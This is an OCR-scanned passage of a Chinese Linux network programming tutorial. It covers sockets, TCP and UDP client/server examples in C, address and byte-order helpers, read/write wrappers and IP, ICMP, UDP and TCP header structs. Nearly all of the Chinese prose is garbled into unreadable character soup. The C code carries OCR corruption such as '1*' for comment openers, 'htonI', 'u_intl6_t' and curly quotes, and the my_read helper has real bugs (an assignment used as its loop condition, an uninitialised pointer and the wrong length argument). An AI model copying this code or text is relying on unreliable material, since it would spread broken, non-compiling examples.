W 2 G (1)

1. Linux MZ5%0RA 44

1.1 5 i PR e R0 e 45 vy P2

P8 28 AR T PR AT A S5 A P DX 31 A2 1 288 A2 e 7 A 30 40 AL Bl -~ 25 it R
554t

W 25 R S AT IR S5 2 R 7 J8 3, S5 25 7 i IR R P38 AT I A B IRV R i IR 5%
PR AR AN T, B AN i AR R OR TSR

1.2 HHAMH4

PR R R A PR 8 43- AL, T LA R R 00 o LR BRI, by L R T A 0 B2 i — 4%
W B P 4 iy 4

netstat

T4 netstat & Sk 7 W 45 (R 42, 1 Tl AR R0 1D e V55 I 42 11145 8L netstat 1211
I BFATH ML TUE -an FIK BoR VRN IR M 4R 28 T e IR TgA T m] DA 7
DO HRAS VEAH IR 5 0.

telnet

telnet J& M H SR FRE I R > (E R 3RAT ] 56 4 ) AR S AN RS R R B AT T 1 IR 45 i A2
FRE. En AT 5 45 2 R5 e Wiy 8888 Ui I, 3kA1Tm L] telnet localhost 8888 K 7%
R4S st (FPARIL.

1.3 TCP/UDP /44

TCP(Transfer Control Protocol) % s il 1y 3 —Fir il ) 3 82 P i3, M FRAT T Y 4 78
FeAEF IXAN ISR I A, 4 2 T DLLRAIE FRATT AR 250 i IR 5 S PR ZE B 2 T 1D, 224 11,

UDP(User Datagram Protocol) FH /= 4R 130 — ik i o) 3 B2 1 U3 X Pl B S+ A

REDRAUETRATT F0 100 28 R P R HE R T 52 14, I ABRAT T E S 5 (AR Py — SRS SR TCP B

M2 GaRE (2)
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2. WML N4 (TCP)
Linux F 402 10 i S AL 4 7 (socket) K HEAT M 44 n R 1) . I 44 F2 /il ik socket AL
JUASBRE T R, 2 o] A SR SO RR AT, AT AT DL XA HR 75 e 30 1) ST
IR R AR AT I A linux BV AE TEORME RS Ak FATT AT A ) Bk 145 32 5 R A 52
T4 &% 2T ) H 0 AU
2.1 socket
int socket(int domain, int type,int protocol)
domain: 5t W AT W0 26 R8T A (14 LR FROIE TR (AF_UNIX R AF_INET 45). AF_UN
IX HAERE FH 20— Unix REEEFE IS, 110 AF_INET J&41 %) Internet [, BR1fi o] BA AR £F
TR ML AL (H3AT] man socket I &3 domain AIEINE PF_*I A2 AF_*, K4
glibc 42 posix 1SZ8L BT LUH PFAVE T ARSI AT 1 mT LS HI ).
type: AT L4 FE 3+ BT K 38 TR B3 (SOCK_STREAM,SOCK_DGRAM 4%) SOCK_STREAM # 1]
FRATHIF S TCP S X A2 B AL HWURP 1, W] 5, X 1] 17 S 42 1) ELAF 37T SOCK_DGRAM
FHIFAVTEH L UDP s, 1X A AR it K i, AN il g, Jo 4 A .
protocol: 1 T-FA IR E T type, FﬁUJX/‘ﬂﬁﬁﬁéﬂ]*ﬂx TEH 0 R MTTLLT sock
et oA I 2 30 THABCHE A O HE 25 D ISR [P SEAF R AT, RGN R [91-1, - errno W] 138 HE Y
FRITE T L.
2.2 bind
int bind(int sockfd, struct sockaddr *my addr, int addrlen)
sockfd: /& B socket i FH IR Bl ) SC -k
addrlen: J& sockaddr 454 (K5
my_addr: & —MiE11 sockaddr FIFaEF. 7E<linux/socket.h>117H sockaddr (¥ X
struct sockaddr{
unisgned short as_family;
char sa_data[14];
j
AN T R G HEA M, FA T SN AN S SO A 55 4 — AN &4 (struct sock
addr_in) RA%¥.7E<linux/in.h>"14 sockaddr_in fJ5E
struct sockaddr_in{
unsigned short sin_family;
unsigned short int sin_port;
struct in_addr sin_addr;
unsigned char sin_zero[8];
BATEZAFH Internet JiTLL sin_family —f % AF_INET,sin_addr # &% INADDR_ANY %
AR A BA AR (8 LA, sin_port & 3412 T i3 115 sin_zero[8] 2 HIKIA 7 1Y)

. bind K A< 1) %7 H 7] socket 3 [B] 1) SCAF R AR IRAE 2. D23k 1] 0, IR 1 AN
socket —#f
2.3 listen
int listen(int sockfd,int backlog)
sockfd: & bind J& [ SCPHEIR .
backlog: ¥ .17 3K HE BN e KA L. 24 224N i B P R IR 55 i AHIE I, A3 HTIXAN R
LA AR HEBAAC L. listen pE250HE bind (¥ SCARAR £ O I Wr e R (BT (R 5 50T b
ind —FF.
2.4 accept
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int accept(int sockfd, struct sockaddr *addr,int *addrlen)

sockfd: /2 listen J& [ SCAF R T

addr,addrlen & k45 % - i (R RE S 1, R 5% a i L BAL b Fia 6t st nT LT bind, li
sten il accept /& ik 55 253 FH (1 k6 4, accept ¥ H I IR 45 2% i (W R P o — B BRZE S — A
PR R T IR accept Jl I ik 1] J A IR 55 4 i ) SCAFR IR A JZAN IR A IR 45
A Al LAAZ AR RS BT RN IR [A]-1

2.5 connect

int connect(int sockfd, struct sockaddr * serv_addr,int addrlen)
sockfd:socket & [A] 1) SR T
serv_addr:fif (7 7 IR 55 as i (FERAE S 2L sin_add 2 IR 25 1 stk
addrlen:serv_addr [fJK: i

connect bR I 5P i FH ok 1R AR 45 o i 422 09 e IR ] 0, s0ckfd 2 7] Ak 45 v i TR ) SCA:
FAFF RIS iz [A]-1.

2.6 Sl

JIk 55 45 g M P

[rEEsx G ISTRIT (SErVer.C) *xrxxaadassxx ]

#include <stdlib.h>

#include <stdio.h>

#include <errno.h>

#include <string.h>

#include <netdb.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

int main(int argc, char *argv[])

{

int sockfd,new_fd;

struct sockaddr_in server_addr;

struct sockaddr_in client_addr;

int sin_size,portnumber;

char hello[]="Hello! Are You Fine?\n”;

if(argc!=2)

{

fprintf(stderr,”Usage:%s portnumber\a\n”,argv[0]);

exit(1);

}

if((portnumber=atoi(argv[1]))<0)

{

fprintf(stderr,”Usage:%s portnumber\a\n”,argv[0]);

exit(1);

}

1* RS2 T ih e 7. socket IR */
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)

{
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fprintf(stderr,”Socket error:%s\n\a”,strerror(errno));
exit(1);

}

/* AR 28imia e sockaddr £5#4) */
bzero(&server_addr,sizeof(struct sockaddr_in));
server_addr.sin_family=AF_INET;
server_addr.sin_addr.s_addr=htonl(INADDR_ANY);
server_addr.sin_port=htons(portnumber);

/* $W45 sockfd k5 */

if(bind(sockfd, (struct sockaddr *)(&server_addr),sizeof(struct sockaddr))==
-1)

{

fprintf(stderr,”Bind error:%s\n\a”,strerror(errno));
exit(1);

}

/* WsWT sockfd ik F */

if(listen(sockfd,5)==-1)

{

fprintf(stderr,’Listen error:%s\n\a”,strerror(errno));
exit(1);

}

while(1)

{

1> RSB, H BRI LE R </
sin_size=sizeof(struct sockaddr_in);
if((new_fd=accept(sockfd,(struct sockaddr *)(&client_addr),&sin_size
)==-1)

{

fprintf(stderr,”Accept error:%s\n\a”,strerror(errno));
exit(1);

}

fprintf(stderr,”Server get connection from %s\n”,
inet_ntoa(client_addr.sin_addr));
if(write(new_fd,hello,strlen(hello))==-1)

{

fprintf(stderr,”Write Error:%s\n”,strerror(errno));
exit(1);

}

[* XA CEL R~/

close(new_fd);

1= fEIRT—A >/

}

close(sockfd);

exit(0);
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}

EONs 75350

JrEEs S PURTRTT client.c *xwxxxas)
#include <stdlib.h>

#include <stdio.h>

#include <errno.h>

#include <string.h>

#include <netdb.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

int main(int argc, char *argv[])

{

int sockfd;

char buffer[1024];

struct sockaddr_in server_addr;

struct hostent *host;

int portnumber,nbytes;

if(argc!=3)

{

fprintf(stderr,”"Usage:%s hostname portnumber\a\n”,argv[0]);
exit(1);

}

if((host=gethostbyname(argv[1]))==NULL)

{

fprintf(stderr,”Gethostname error\n”);

exit(1);

}

if((portnumber=atoi(argv[2]))<0)

{

fprintf(stderr,”"Usage:%s hostname portnumber\a\n”,argv[0]);
exit(1);

}

1% R PRET RS sockfd #EIRRF */
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
{

fprintf(stderr,”Socket Error:%s\a\n”,strerror(errno));
exit(1);

}

/* PR RS ) BERE */
bzero(&server_addr,sizeof(server_addr));
server_addr.sin_family=AF_INET;
server_addr.sin_port=htons(portnumber);

server_addr.sin_addr=*((struct in_addr *)host->h_addr);
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1= PR REERT R */
if(connect(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr)
==-1)
{
fprintf(stderr,”Connect Error:%s\a\n”,strerror(errno));
exit(1);
}
1= BRI T */
if((nbytes=read(sockfd,buffer,1024))==-1)
{
fprintf(stderr,”"Read Error:%s\n”,strerror(errno));
exit(1);
}
buffer[nbytes]="0";
printf(“l have received:%s\n”,buffer);
[ SERGEIR */
close(sockfd);
exit(0);
}
MakeFile
KELAMEMH GNU ) make SRR PR e, 26T make FITEA Uil I, Make HA4
HiHHHH I Makefile #HHH#HEHHAHH
all:server client
server:server.c
gce $™ -0 $@
client:client.c
gcec $7 -0 $@
1E4T make JE A7 AL server(IR 45 255) F client(%% /' 3i) 561547 ./server port
number& (portnumber BAETEE—A4> KT 1204 HAE/ete/services H IELHI S5 #iFH 888
8 U T),48)51217 .[client localhost 8888 FHEH 114 4. (fRtLAT LA telnet Al n
etstat B0 —iX.) _EE — R A MR, A AR WA UL VR 2 Rk
MBERAMRE. e N — AT HIVEAN I 3.
2.7 g
A AR R 0 2 R 2 R PSP 23 A PSR- ) s R IR 55 i e A TR AR ST 0 R — RO
IR 55 2 vt
socket-->bind-->listen-->accept
B i
socket-->connect

P 26 i 72 (3)

3. MRg5as A% HLAAS S pa 2
X FEIRATIR A 2 AR ) 2% 7 1T A R R L
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3.1 PR

1A 25 LT VF 2 B RIHLAR, X S L2 s Bl i 7 IR S AN ALY, Lt 386 A5
JT AR T 1A A AF B RIS, w5 7 19 5 = o, 1T alpha o517 AR e, 4 7 48—tk 7E L
nux T AT TR R L

unsigned long int htonl(unsigned long int hostlong)

unsigned short int htons(unisgned short int hostshort)

unsigned long int ntohl(unsigned long int netlong)

unsigned short int ntohs(unsigned short int netshort)

TEIX DAk Bt h AR host, n A& network.s f{% short | {3 long —4~i
H = SR ANLAR L1 long Hi A M 4% i) long. HoAb LA R & X ZEARZ

3.2 IP FIH A 1) e 4t

FER 28 _LARE— B HLE AT LU 1P 8 2 44 IS A ATV 4 23 AT e 45elig ?

struct hostent *gethostbyname(const char *hostname)

struct hostent *gethostbyaddr(const char *addr,int len,int type)

fE<netdb.h>""15 struct hostent [ 5& X

struct hostent{

char *h_name; /* FHLHIIEXZFR */

char *h_aliases; /* TFHLEIRI4 */

int h_addrtype; /* FAHLIHINEZEAL AF_INET*/

int h_length; /* EHHHEK RS ST 1P4 & 4 5275 32 fii*/

char **h_addr_list; /* FEHLI IP HutikF)5R */

}

#define h_addr h_addr_list[0] /* ML —A IP Huhb*/

gethostbyname 7 LLEHLES 4 (U1 linux.yessun.com)& 4y — AN G5 R 4a4E IRIX A 451y HL
IHf# A7 T4 1E B

gethostbyaddr T LICK—> 32 £ IP #1kil:(COAB0001) 4% #e y 45 445 4T

XA BB IR 7] NULL H¥%# h_errno £ i%48 4 M h_strerror() AT LAS-2I9E41 19
HEHE B

3.3 FAFHI IP I 32 K711 IP k.

TER 28 I IRATT B 1P 05 2 % £4(192.168.0. 1) M i, TTE struct in_addr 5y
FH A 32 4710 1P, FAl] LIHIARAS 32 47 IP(COA80001) 4 () 192.168.0.1 Jy T 45 3Ai n] LA
3 THIPE AN BRI 2

int inet_aton(const char *cp,struct in_addr *inp)

char *inet_ntoa(struct in_addr in)

AR a AR ascii n AU network. 5 — /N EER R ab.c.d (1) 1P F40y 32 £ |
PAFMHAE inp FiEH HLIRL 26 AN 2¥s 32 £ IP 4 ab.c.d (gL

3.4 JIRg5 15 KRR EL

I 2T P L TR FRAT A7 o)k T B2 e oty 1 0P IR S5 A B X I A T o LA A B L
Nk

int getsockname(int sockfd,struct sockaddr *localaddr,int *addrlen)

int getpeername(int sockfd,struct sockaddr *peeraddr, int *addrlen)

struct servent *getservbyname(const char *servname,const char *protoname)

struct servent *getservbyport(int port,const char *protoname)
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struct servent

{

char *s_name; /* IERRS % */
char **s_aliases; /* 5| &4k */
int s_port; /* #1455 */

char *s_proto; /* IR */
}

FERAIIR A FIIX LA™ B R 2% 77 3, 24 AT 12443 B R 13 115 I 5 connect 3 JH ik
DyJe A P A3 20 ARG e 5 o0f 3 IR g5 o, 30 TH] INADDR_ANY S5 Jm, b 1 #5513
FEH 1P FRATAT LAFE accept WAL E A I3 1P Mokl
FEM S8 V2 (R BRI TR IR 45, e nds 11 21 % ftp80 X B, WWW. o T 18 B4 5 1 15
fRIRSS FATTRT LA IS8 DU o K, A S A 1 45383 15 T LA ] S8 = AN R 4
35 — Al
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc ,char **argv)

{

struct sockaddr_in addr;

struct hostent *host;

char **alias;

if(argc<2)

{

fprintf(stderr,”"Usage:%s hostname]ip..\n\a”,argv[0]);
exit(1);

}

argv++;

for(;*argv!=NULL;argv++)

{

7> XRIAMEAL 1P*/
if(inet_aton(*argv,&addr.sin_addr)!=0)

{

host=gethostbyaddr((char *)&addr.sin_addr,4,AF_INET);
printf(“Address information of Ip %s\n”,*argv);

}

else

{
1% R AEE IR A 2%/

host=gethostbyname(*argv); printf(“Address information

of host %s\n”,*argv);

}
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if(host==NULL)

{

1 HARE T AT

fprintf(stderr,’No address information of %s\n”,*arg

V)i

continue;

}

printf(“Official host name %s\n”,host->h_name);

printf(“Name aliases:”);

for(alias=host->h_aliases;*alias!=NULL;alias++)

printf(“%s ", *alias);

printf(“\nlp address:");

for(alias=host->h_addr_list;*alias!=NULL;alias++)

printf(“%s " inet_ntoa(*(struct in_addr *)(*alias)));

}

}

FEIXAME T B, 0 T W H SN2 1P B3k 44 AT 1R T PIAN BR 4 28 — I kAT 1R
Pl N (52 1P T LA inet_aton, ZRIGHYIN s, 798 F] gethostbyname 175 2145 E..

W 244 2 (4)

4. ERERIE S R

— HLIRATEENT TR, AT R — D A TS T AL Linux N IRHEBATT B g 7 0 i
G PN SRR AT XA IR 55 4 g A1 35 1 iy MEAT X0 A5 I i, AT SO R A5 HL 1T 1525 AR
T R EAE AR E —HE.

4.1 TRH write

ssize_t write(int fd,const void *buf,size_t nbytes)

write B%CKs buf T nbytes 71 A E AN SCHFRIRFT fdl. Jl DIy 9] 5 1) 55 5 R Wy
RM-1. JFRCE errno AR R FERIZERE T T, 2 IRA] ) B SRR AT S IN A R A AT e

L)write (R [FHMEK T 0,815 T # 70 Bl 1 4 A 2edhs.
2)IR[BIRE /N T O, BhINE H IR T 508 AT AR P RIS B AL 2.
IR EINTR LR AE S IR 3L T o s i

SN EPIPE SRR W4 EH LT I IO 7 LG T 15 4%).
H T AEFECA RO O, FATE O E —ANE B HCR AR HX LA .
int my_write(int fd,void *buffer,int length)

{

int bytes_left;

int written_bytes;

char *ptr;

ptr=buffer;

bytes_left=length;

while(bytes_left=>0)
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{

/* JHURE*
written_bytes=write(fd,ptr,bytes_left);
if(written_bytes<=0) /* 4 1>/

{

if(errno==EINTR) /* hWrsiin FAI4REE>/
written_bytes=0;

else /* JUAbAR IR BAT Mk, HAFROR 17*/
return(-1);

}

bytes_left-=written_bytes;

ptr+=written_bytes; /* M| T b7 4k4LE */
}

return(0);

}

4.2 k%Y read

ssize_t read(int fd,void *buf,size_t nbyte) read e %2 15t A fd FHEEEL P 2% 24 1L
J IS read 3 9] SR T3 A -5 H W AR R IR S O FRom DB R T /N T
0 o HHBL 7 HfF k. R AR R EINTR Ui I/ b W5 RS Y, i ECONNREST &7 4%
BT L AL A, AR S A A OB AL
int my_read(int fd,void *buffer,int length)

{

int bytes_left;

int bytes_read;

char *ptr;

bytes_left=length;

while(bytes_left=0)

{

bytes_read=read(fd,ptr,bytes_read);
if(bytes_read<0)

{

if(errno==EINTR)

bytes_read=0;

else

return(-1);

}

else if(bytes_read==0)

break;

bytes_left-=bytes_read;

ptr+=bytes_read;

}

return(length-bytes_left);

}
4.3 Hli ittt
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BT ETPEAS BRI BATR AT LA 25 7 i B IR 45 i A% 6 AR T Lt 3R A —
gk T LA T 77 50

1* B RS ImE >/

struct my_struct my_struct_client;

write(fd,(void *)&my_struct_client,sizeof(struct my_struct);

il €8 iiE )

char buffer[sizeof(struct my_struct)];

struct *my_struct_server;

read(fd,(void *)buffer,sizeof(struct my_struct));

my_struct_server=(struct my_struct *)buffer;

TR 2% b AL 38 R I B AT — AR SO BAR F A0 char 2824 (R 55 A% 36 B ) It e —
FEIR) TR BT DB PGS EAL SR B (TR A AR B 4R 4 A& A AT AT 5 ST, FRAT T4
AL I TR BT TR 1) B 4)

I 28 2 72 (5)

5. M Hundk Ak

FATHT T 2857 2] W Z AR P ) — AMROR I8 23, F AN 23 R AR, FATT 9 b L m] LS Hy
KA 2T TCP WU M2 57 T IAEAE Linux R IR 23 R 7 80 H B AT b TH i 2 (1)
VR G ). FRATT A L4k — SR PR S % — RO 5, AT 2% > — R 3L T UDP
I P 28 TR

5.1 PN R R 2

int recvfrom(int sockfd,void *buf,int len,unsigned int flags,struct socka

ddr * from int *fromlen)

int sendto(int sockfd,const void *msg,int len,unsigned int flags,struct s

ockaddr *to int tolen)

sockfd,buf,len )5 (A read,write —Ff, 73 5l B R B4 7 HIAR AT, Sk B (1 22 v X

J R/ recvfrom 415 )\ sockfd I8, Ak from A& NULL A1 from HLITIA-6i 115 &
SR A L, U R B IR SR AN B R, 7] LA from AT fromlen 5 25 NULL.sendto £ 3%
] to AIEAH B UL 7L to HLIIAFf T WO fs B 70 O TEAN Bk

5.2 —Asfl

1* RSP server.c */

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <stdio.h>

#include <errno.h>

#define SERVER_PORT 8888

#define MAX_MSG_SIZE 1024

void udps_respon(int sockfd)

{

struct sockaddr_in addr;

int addrlen,n;
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char msg[MAX_MSG_SIZE];

while(1)

{ /% MW&s LR BRI ML Lk */
n=recvfrom(sockfd,msg,MAX_MSG_SIZE,O,
(struct sockaddr*)&addr,&addrlen);
msg[n]=0;

* BRSO EWEI THE */
fprintf(stdout,”l have received %s”,msg);
sendto(sockfd,msg,n,0,(struct sockaddr*)&addr,addrlen);
}

}
int main(void)
{

int sockfd;
struct sockaddr_in addr;
sockfd=socket(AF_INET,SOCK_DGRAM,0);
if(sockfd<0)

{

fprintf(stderr,”"Socket Error:%s\n”,strerror(errno));
exit(1);

}

bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_addr.s_addr=htonI(INADDR_ANY);
addr.sin_port=htons(SERVER_PORT);

if(bind(sockfd, (struct sockaddr *)&ddr,sizeof(struct sockaddr_in))<0

)
{

fprintf(stderr,”’Bind Error:%s\n”,strerror(errno));
exit(1);

}

udps_respon(sockfd);
close(sockfd);

}

1= PR */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

#include <stdio.h>

#include <unistd.h>

#define MAX_BUF_SIZE 1024

void udpc_requ(int sockfd,const struct sockaddr_in *addr,int len)

{
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char buffer[MAX_BUF_SIZE];

int n;

while(1)

{7 MBS, B BRGS0 >/

fgets(buffer, MAX_BUF_SIZE,stdin);
sendto(sockfd,buffer,strlen(buffer),0,addr,len);
bzero(buffer, MAX_BUF_SIZE);

1 W Bk, S B B L x/
n=recvfrom(sockfd,buffer, MAX_BUF_SIZE,0,NULL,NULL);
buffer[n]=0;

fputs(buffer,stdout);

}

}

int main(int argc,char **argv)

{

int sockfd,port;

struct sockaddr_in addr;

if(argc!=3)

{

fprintf(stderr,”"Usage:%s server_ip server_port\n”,argv[0]);
exit(1);

}

if((port=atoi(argv[2]))<0)

{

fprintf(stderr,”"Usage:%s server_ip server_port\n”,argv[0]);
exit(1);

}

sockfd=socket(AF_INET,SOCK_DGRAM,0);
if(sockfd<0)

{

fprintf(stderr,”Socket Error:%s\n”,strerror(errno));
exit(1);

}

/= BRI BOR */
bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(inet_aton(argv[1],&addr.sin_addr)<0)

{

fprintf(stderr,”Ip error:%s\n”,strerror(errno));
exit(1);

}

udpc_requ(sockfd,&addr,sizeof(struct sockaddr_in));

close(sockfd);
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}
HEHH R G0 SO Makefile sttt

all:server client

server:server.c

gcc -0 server server.c

client:client.c

gcc -o client client.c

clean:

rm -f server

rm -f client

rm -f core

R S A SRR K G RIS AT R, 2RISR AR L, B AT S

Ui SR RIS AT 2% 7 O AL %% ) S AN AR SR RS B IR S5 3, A RS o s MBI (E B H

SR A S IS AT AN P g, T JIR S5 s A R A R AT DAAS R S FRA AT g
AN i B ZE T 0 SR N T S A R R 1, 1 VRS WA T UDP B S A

DRAE AT FERMCE K, i LLIRAT L AR AR BRI, RGN BENS CRAEFRATT A A5

SFEBIERTC R A B3 H . — R B BRATILE S 5 199 25 15 R I i 40 4 3 ] TCP 3L

W45 74 (6)

6. MIRER TR

FEHT IR LA HLi, AT D2 T B AR S BB 5 (5 BT i — 2L ek B (r

ead,write) i 04 45 1 7 HEL 17 f5 55 A% 14 BR B0 A e S0 RO AEEAS R B0 A — o L IR, A1) —
TSR 2] 4% AT TR e R R B X T RRAT T 20 D0 A LA R 4L

6.1 recv fil send

recv Al send & HER ML T H1 read A1 write A 2 (D fe A AL TS HCk ]
BGHRAE.

int recv(int sockfd,void *buf,int len,int flags)

int send(int sockfd,void *buf,int len,int flags)

i) =N ZH0R1 read, write —FF, 55 DU SH0T LU 0 s 2 LR IO4LE

| MSG_DONTROUTE | AN #k#h# |

| MSG_OOB | #azol# KIET AN |

| MSG_PEEK | & 4dli, JE A MRG0 X B L |

| MSG_WAITALL | Z545 014 % |

| I

MSG_DONTROUTE: & send & HUfll FH (M7 & 3X A& 5 U 1P WSl H I ENLAEAHL R 2% [
A b BEAT R A XA bR E — R SIS IR A i R R LT

MSG_OOB: 7 ] LLZWURUR k4l S K Hicts . D¢ Tl AN FRATT LS 25 Al BRI
MSG_PEEK: /2 recv BB A7 &, R AR G X P BN 25, AN 28 R ety
DX P N 2 X RE R P IR IR A A7 4R “~—#—Eﬁ WA — AR 22 A AR 525 Hdls i T LA
EAFRE.

MSG_WAITALL & recv eR 5 AT AR &, R 58 BT 1045 K BB I A 1R [5] AT IX AN b s
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I recv [A]— B BHLIE, HL 28 & M AP AL, B0 /2 R AR T Rk, 1) 2413 T 4R E 17
I, B BOE 8 R[] R [AE AT len 2)24 803 7 SOPF A5 RN, B8 B0 5 3 0] R [RHE /) T
len 3) 2435 4E & A AR R B -1, H 358 B A5 0 A0 B 45 1% 5 (errno)

Wi flags 24 0,1 read,write —FE R34 284G L& 1 J LA I, A BAT 15 B3 - IAR
A AT F Linux Programmer's Manual 75 217 41 fif B¢

6.2 recvfrom FlI sendto

XA R T AEAR B R 7 I 2% A5 P 24 vh (UDP), AT B & AE R I 22 T

6.3 recvmsg F sendmsg

recvmsg Fil sendmsg A LASEILHTTHITA 10135 R D) RE.

int recvmsg(int sockfd,struct msghdr *msg,int flags)

int sendmsg(int sockfd,struct msghdr *msg,int flags)

struct msghdr

{

void *msg_name;

int msg_namelen;

struct iovec *msg_iov;

int msg_iovlen;

void *msg_control;

int msg_controllen;

int msg_flags;

}

struct iovec

{

void *iov_base; /* ZZpP X IR IE */

size_tiov_len; /* XK */

}

msg_name F1 msg_namelen 44457 & AR T [ 3% 45 I8 (UDP), B AT IAZ A HE ORI 126 5 fy ik
15 J..msg_name 52r_F S —M5 1 struct sockaddr FIFE4%l, msg_name & 45 M K 244
P SR T ) SR X P AMEL R ¢ NULL. misg_iov F1 msg_iovlen 48 H1 4552 70 % 32 K 22 o
X P 2¥.msg_iov & — AR ER, msg_iovien $5 H X AN S5 B 4H 12K 21N . msg_control I
msg_controllen X 28 & HIKFR ORI RS 42 AR IN 1) msg_flags 45 i #32 Flk %
(R TRL A recv,send FRIZEIR—FF

6.4 BRI HIEH]

S P A 1 BR 2 close A1 shutdown. ] close I AR ATT 5% A ST 1F—FE.

6.5 shutdown

int shutdown(int sockfd,int howto)

TCP S F & MU (¥ (& 1T 325 19), MBI T close B, 23 HE3 5530 1 #1 0% P41, A I A1 1 5
B EUOR I —ANJ5 ) X AN HEFRATT AT LAEEH shutdown. &1 XA [H] 1 howto, 5 45 B K BUAS [+
{IPSEIpIE

howto=0 IX AN N5 5 4t 3 G P T AH 2 W] AR AT B A iR 4 5

howto=1 I i, Fl_E 1HAH i 36 Izt R rT LA T

howto=2 X[ 5l 18, M1 close —#f 7ELBERERE R LI, WA J LA TRt = — B
TR AL shutdown, JEA BT B 5 BEREARAN BERE AT T IX AN I IRATT H e
{811 close K% 7 HERE IO B 7 AR T
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4 22% i 12 (7),

7. TCP/IP 1}
PRAB VT Ik TCP/IP B, I AR Jinitd B AT 4 & TCP A4 0 1P W27 ax— 5 LT, Fdi ] —
JER2E SIS H R R 4% B2 L.

7.1 WAL )

LSRR I VLSRR, IS AR N % 28 I T 9 268 A i 0 S I A M A AR M 5 1
MNATTA T AR I 1R 7 3, SE % A 3 R 7 A IR N AR a1 )
A2, W48 2 AR B R A B A i T 2 DR AR I, 2 B )

i RN E R I Ny =5 SN (TR NIV M €7 L T M KRN N = (S AN [N e = 2 8
Hes AN ILE ARG T RARA A I, R B A B2 2 i X S AR VG 1. I A

o3 o 0, i ELA 2 AR FH AR

7.2 1P #pi

IP PSR AE W 28 RS e 2 B2 58 s B ) AR . N TN R 1P4 RSl ks
Fiy

0481632

[RRA | E AR | A5 2R B e |

| ¥R |DF |MF| # - fe |

| AEAFINTR] | PR | PRALR A |

| V5 IP ik |

| HA 1P uhk |

FHFEANE—F IP 458 ¢ X <netinet/ip.h>

struct ip
{
#if _ BYTE_ORDER == __LITTLE_ENDIAN

unsigned int ip_hl:4; /* header length */
unsigned int ip_v:4; /* version */
#endif

#if __ BYTE_ORDER == _ BIG_ENDIAN
unsigned int ip_v:4; /* version */

unsigned int ip_hl:4; /* header length */
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#endif

u_int8_t ip_tos; /* type of service */

u_short ip_len; /* total length */

u_short ip_id; /* identification */

u_short ip_off; /* fragment offset field */

#define IP_RF 0x8000 /* reserved fragment flag */

#define IP_DF 0x4000 /* dont fragment flag */

#define IP_MF 0x2000 /* more fragments flag */

#define IP_OFFMASK Ox1fff /* mask for fragmenting bits */
u_int8_t ip_ttl; /* time to live */

u_int8 tip_p; /* protocol */

u_short ip_sum; /* checksum */

struct in_addr ip_src, ip_dst; /* source and dest address */

}

ip_VIP PSR RRAS 5 X Lt 4,07 IPVE Lk T

ip_hIP A0 B 8 SXAMEL LA 4 <775 24 SR NP s 38 f il e K oy 20 AN, 1 2 1P £
WA LI, IR A X AME N 5.

ip_tos MR25 28, B BRI IO SE L.

ip_len 1B 1P B (A 5 LS5 2k Ffir.

ip_id FRIHIXAS 1P £l .

ip_off W J1fA% , XA _Lifi 1D — & R EE4LRE 1 1.

ip_ttl AEAEIN () B 22— AN R (R ISR —, L3I0 O I g Pl 5.
ip_p P, e 7n B A 1P Eodh A i i J2 i fn TCP,UDP il
ip_sum B RS 56, SRS B A 1R

ip_src,ip_dst K& FHEWCE 1) 1P il

KT IP ORI VEATE UL, 2% RFCT91

7.3 ICMP ¥

ICMP 2 B B0 I3, b T P 4 J22 AR 28 E AR |P s I, o R R 28 T i, T4 7t
23 H 1ICMP SO AR 5 .

ICMP G S5 B

0816 32

| A | ARRS | BN |

| Aot | Hci |

ICMP fE<netinet/ip_icmp.h>1 1 5E X2
struct icmphdr

{

u_int8_t type; /* message type */
u_int8_t code; /* type sub-code */
u_intl6_t checksum;

union

{
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struct

{

u_intl6_t id;

u_intl6_t sequence;

} echo; /* echo datagram */

u_int32_t gateway; /* gateway address */
struct

{

u_intl6_t _ unused;

u_int1l6_t mtu;

} frag; /* path mtu discovery */

}un;

+

KT ICMP HR SR AR T L i) AAE A RFCT792

7.4 UDP HMY

UDP WM& JEL AT 1P s il bk, AR 4 2 1A 3L UDP 1 1P #8FF & AN i 42 1) 4
PR IR 45 . UDP 13k X0 :

01632

| UDP i E | UDP H s A |

| UDP s 4R K5 | UDP BRI s |

UDP Zifi#E <netinet/udp.h=> )€ X -
struct udphdr {

u_int16_t source;

u_intl6_t dest;

u_intl6_t len;

u_int16_t check;

Y

KT UDP B PEAR 1 IL, 752 % RFCT768
7.5 TCP

TCP Pt i 7E 1P Wil 1K), AN TCP WS AT JE [ A% U 3% 10 TCP [k s 45
Fg bR P 485 M R A .
04810162432

| WmE | HfE

| 515 |

| #iAS |

[T UIAIPISIF] |
[E K]t/ IRICISIYI |
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[ 1 IGIKIHININ] |

| ALHAT | RBRE |

| 350 | 7T |

TCP 45 #7E <netinet/tcp.h>H 32 XLh:
struct tcphdr

{

u_int16_t source;

u_int16_t dest;

u_int32_t seq;

u_int32_t ack_seq;

#if __ BYTE_ORDER == __ LITTLE_ENDIAN
u_intl6_t resl:4;

u_int16_t doff:4;

u_intl6_t fin:1;

u_intl6_t syn:1;

u_intl6_t rst:1;

u_int16_t psh:1;

u_intl6_t ack:1;

u_intl6_t urg:1;

u_intl6_t res2:2;

#elif __BYTE_ORDER == __ BIG_ENDIAN
u_intl16_t doff:4;

u_intl6_t resl:4;

u_intl6_t res2:2;

u_intl6_t urg:1;

u_intl6_t ack:1;

u_intl6_t psh:1;

u_intl6_trst:1;

u_intl6_t syn:1;

u_intl6_tfin:1;

#endif

u_intl6_t window;

u_intl6_t check;

u_intl6_t urg_prt;

j

source 3% TCP Hudfs (s 11

dest #232 TCP #ifs 1) H (¥ 55 1

seq briHiz TCP Firt & I 7 1 K T AR P41 5
ack_seq N FH 5, RoR iR T T — IR B 7515 .
doff Zd & ISP sl HE, BL 4 2755 Ay AR IR 5
urg WR VR R SR R WA 1
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ack WIS IR, R4 0 1

psh Ui E A 108 A5 T B 5 S B A gy b — R R

